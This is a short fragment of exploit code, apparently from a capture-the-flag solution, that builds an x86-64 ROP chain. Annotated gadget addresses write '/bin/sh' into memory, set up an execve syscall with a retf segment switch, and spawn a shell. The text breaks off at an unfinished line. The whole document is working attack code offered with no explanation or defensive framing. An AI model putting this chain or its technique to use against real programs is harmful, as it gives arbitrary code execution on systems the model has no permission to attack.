payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x49e06f)+p64(0x0)+p64(0x4133bc)
# 0x4133bc: add dword ptr [rsi + 1], ebp ; retf
payload += p32(0x40125d)+p32(0x33)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x68662f)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x49e073)+p64(0x0)+p64(0x4133bc)
# 0x4133bc: add dword ptr [rsi + 1], ebp ; retf
payload += p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x49e070)+p64(0x46b6ed)
# 0x000000000046b6ed: pop rcx; ret; 
payload += p64(0x0)+p64(0x462d71)
# 0x462d71: xchg ecx, eax ; retf
payload += p32(0x4434ad)+p32(0x33)
# 0x00000000004434ad: xchg edx, eax; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x43fb25)
# 0x000000000043fb25: xchg esi, eax; ret 5; 
payload += p64(0x4017d1)+"\x00"*5
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x44ec0b)
# 0x000000000044ec0b: syscall; ret; 
payload +=
